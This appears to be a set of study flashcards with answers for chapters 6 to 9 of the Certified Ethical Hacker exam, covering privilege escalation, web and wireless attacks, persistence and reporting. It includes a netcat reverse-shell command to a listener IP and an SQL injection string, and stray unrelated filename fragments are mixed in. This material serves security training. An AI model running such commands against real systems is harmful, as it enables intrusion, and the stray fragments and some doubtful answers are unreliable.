CEH Ch6 - Ch 9


8-10 You've searched a Linux system for programs with special permissions set, and found a number owned by root. Which of the following might you be able to abuse for privilege escalation? Choose all that apply.

-rwxr-sr-x. 1 root root 55416 Feb 9 2019 settest; -rwsr-xr-x. 1 root root 421992 Apr 15 2018 secoptd; -rwsr-sr-x. 1 root root 8312 Mar 10 2019 rndetect

multimedia.exe

1

7-1 You're designing an exploit script that begins by sending a long string of numbers to a field that's only supposed to hold a four-digit variable. What kind of vulnerability are you targeting? Choose the best response.

Buffer overflow

7-6 While preparing for a web application penetration test, you're researching a recent XSS attack against a similar application. The developer showed you the JavaScript code used to sanitize and validate input in the browser; you're not really a coder, but it seems like it would have prevented the attack. What is the most likely reason the web application was vulnerable? Choose the best response.

Client-side validation can be easily bypassed.

8-3 You've found a running file server filled with sensitive data, but the local login interface is protected by a strong password and the drive has full-disk encryption. What kind of attack might give you access to the file system? Choose the best response.

Cold boot

8-16 To achieve your testing goal, you need to maintain access for two weeks, then clean up your tracks in time for an internal security audit a week later. Ideally, there should be no sign an attack had even occurred. Which element of your draft plan should you probably change? Choose the best response.

Completely wipe system logs before you leave

8-14 You've deployed a remote access Trojan on several computers in the target network, but it keeps getting discovered by antivirus scanners and deleted. What options would allow you to evade detection and maintain the backdoor? Choose all that apply.

Create a scheduled task; Install a rootkit instead

8-4 What kind of specialized system is most likely to run an off-the-shelf workstation operating system with custom applications installed? Choose the best answer.

POS

8-1 A factory production line is controlled by specialized expansion cards on an old PC. Compatibility with those cards and their control software requires an outdated operating system that's no longer receiving security updates. Which of the following controls would make it hardest for you to exploit the system? Choose the best response.

Placement on an isolated secure network

6-4 Which of the following attacks primarily targets vulnerable switches? Choose the best reply.

VLAN hopping

8-13 Which of the following remote access protocols both provides GUI access and isn't tied to a specific operating system? Choose the best response.

VNC

6-11 You've enumerated a number of WAPs with different security settings, and you suspect that all of them have old firmware. Which of the following could you target with a Pixie Dust attack? Choose all that apply.

WPA-PSK with TKIP encryption, WPS enabled; WPA2-PSK with CCMP encryption, WPS enabled; WPA2-PSK with CCMP or TKIP encryption, WPS enabled

8-15 You're trying to perform lateral movement through a Windows network. The teammate who performed the network scans earlier in the test noted that TCP ports 5985 and 5986 were open for remote management on a number of workstations. What remote access program would you use to target those ports? Choose the best answer.

WinRM

6-6 Which of the following statements about ARP poisoning is not actually true? Choose the best answer.

You can target hosts but not switches.

8-5 You've gained access to a server through a network exploit, but you're not sure if it's a physical host or a virtual machine. What commands could you use to verify that the server is a VM? Choose all that apply for either Linux or Windows.

ifconfig; systemd-detect-virt; wmic baseboard get manufacturer,product

8-6 You found an exploit that lets you issue a system command on a Linux server, and you already control a Windows computer listening for connections on port 80. Which of the following NETCAT commands will open a reverse shell connection to your Windows listener? Choose the best response.

nc 10.10.10.150 80 -e /bin/bash

8-12 You've achieved administrator privileges on a Windows computer, and now you want to create some local users from PowerShell. Which command is the easiest way to do it? Choose the best response.

net

8-7 You've successfully created a NETCAT reverse shell. Which of the following can you use without first performing a shell upgrade? Choose all valid answers.

python; sudo

6-9 You want to try cloning the target organization's RFID badges. You haven't been able to inspect one close up, but you heard someone say they work up to 50 cm and can't be used with NFC devices because they're a different frequency. What frequency range should you get a reader for? Choose the best response.

125-134 kHz

program.exe

2

sequence.exe

3

alpcaca.exe

4

alpserv.exe

5

server.exe

6

8-8 You want to install keyloggers on a number of workstations in order to capture login credentials for the servers you're really targeting. You're trying to decide, on a case-by-case basis, between software keyloggers that email captured input and hardware keyloggers which store input in flash memory. For which of the following is a hardware keylogger definitely a bad idea? Choose all that apply.

A reception desk computer is positioned with its back panel facing anyone who comes up to the desk; You'll be able to access a file room computer easily during some scheduled facilities repair work, but after that you don't know if you'll be able to access the basement it's in.

9-7 The target environment isn't subject to any specific industry regulations, but the client wants strong security policies which don't violate NIST guidelines where possible. You've discovered a system with very weak password policies. Which recommendations will you include? Choose all that apply.

Accounts should be temporarily locked after five failed login attempts; New passwords should be checked against a database of weak and compromised passwords before approval; Self-service password resets should be verified through a reset link sent to the user's registered email address

9-3 Which of the following is not a component of a DREAD score? Choose the best response.

Availability

6-10 You found a tool designed to wirelessly steal contact lists from the older phones used by some employees at the target organization. What kind of attack is it? Choose the best response.

Bluesnarfing

6-1 You just found an unexpected configuration change in a router's DHCP server. It now directs all connecting clients to use a non-standard, unauthorized DNS server. What kind of attack do you suspect? Choose the best response.

DNS hijacking

7-9 You got a hold of some memos exchanged during the development of a web application you're targeting. The lead developer assured the CISO that with the new input sanitization routines the front-end server won't allow executable scripts to be stored in the database. What kind of XSS attacks might you still be able to try? Choose all that apply.

DOM based; Reflective

7-4 You find that a web application stores secret session information in a hidden element within the browser. It's not visible to the user, but it's easy to extract with a client-side attack. What sort of information exposure are you targeting? Choose the best answer.

Document Object Model

6-7 The Z-Shave attack is an example of what kind of attack? Choose the best answer.

Downgrade

7-5 You're examining a program's behavior under non-standard conditions, and looking for vulnerabilities to exploit. Which of the following would be most useful in an attack? Pick the best answer.

Errors are accompanied by verbose messages explaining exactly what went wrong.

6-3 Users are reporting a server responding slowly in what sounds like a high network load, but overall traffic to the server isn't high enough to explain the problem. What evidence can you look for in that traffic to find out if it's a network DoS attack? Choose all that apply.

Excessive SYN packets; Malformed packets

9-2 The client prefers to use quantitative risk assessments. Which model would better fit your report? Choose the best response.

FAIR

9-9 A web application you tested has serious SQL injection vulnerabilities, and another was extremely secure. You're recommending that the client use the secure application's security model to improve the insecure one. One feature on the secure application is that the SQL server itself passes input from the application server into precompiled SQL statements, while the insecure one dynamically generates them. What specific recommendation will you put in your report? Choose the best reply.

Implement parameterized queries

7-8 A teammate supplies you with an automated attack script for a web application. Browsing the script you see it has an input string containing 1' OR '1'='1. What kind of attack does this most likely indicate? Choose the best response.

Injection

7-7 You're reviewing a web application for a white box test. Which of these features might you be able to exploit? Choose all that apply.

Input errors are logged and clearly displayed to users in full detail; Input validation is performed more rigorously on the client side than the server side; Secret cookies are used to prevent XSRF attacks.

6-8 You can't get close enough to the facility interior to launch an evil twin attack against its wireless clients; in fact, you haven't even discovered their SSIDs. What you have discovered is a number of employees eating lunch in a park outside on warm afternoons. What kind of evil twin attack can target those users' laptops and smartphones? Choose the best reply.

Karma

9-8 You discover that all Windows systems in the target Active Directory network are configured with the same local administrator password. What tool should you recommend the client use to correct the issue? Choose the best response.

LAPS

8-11 You saw a teammate retrieve credentials from a Windows 7 machine using the procdump command. Where were they probably stored? Choose the best response.

LSASS

9-10 Which follow-up step will be affected least by a client's individual requirements? Choose the best reply.

Lessons learned meeting

6-2 You want to perform a DoS attack against a database server, but doing it through sheer packet volume isn't really practical or desirable. Which DoS techniques might you try? Choose all that apply.

Low and slow; SYN flood; Teardrop attack

8-2 Which operating system offers server features as an add-on package for the standard workstation product? Choose the best response.

MacOS

9-4 What part of the report is the most appropriate place to explain the metrics you use to calculate risk? Choose the best response.

Methodology

7-3 The target organization has workstations configured to check all applications for code signatures. What attack types will that make more difficult? Choose all that apply.

Modified and recompiled applications; Trojan horses

7-2 A security blog you read just published an application exploit that allows privilege escalation via a series of normal data inputs, with a specific sequence and timing. What kind of vulnerability does it target? Choose the best response.

Race condition

6-5 On a wired network, what protocols are generally targeted by downgrade attacks? Choose all that apply.

SSL; TLS

7-10 You plan to perform a session hijacking attack by sending the victim a link to a legitimate application, but which logs in with a session ID of your choosing. What kind of attack are you performing? Choose the best answer.

Session fixation

9-6 You're recommending that the client implement two-factor authentication on a high security system. Which of the following would qualify? Choose all that apply.

Smart card and fingerprint scan; Password and iris scan; Password and OTP

9-1 Which of the following are good guidelines for writing an executive summary? Choose all that apply.

Summarize the high priority findings; Include recommended actions; Keep it under two pages

9-5 During the planning phase of a penetration test you review a draft document for report presentation. Which clauses should you suggest changing before it goes to the client for approval? Choose all that apply.

The final report will be distributed by email to stakeholders who cannot attend the formal meeting; After the engagement, both parties will retain the full report results for as long as the target network remains in service.
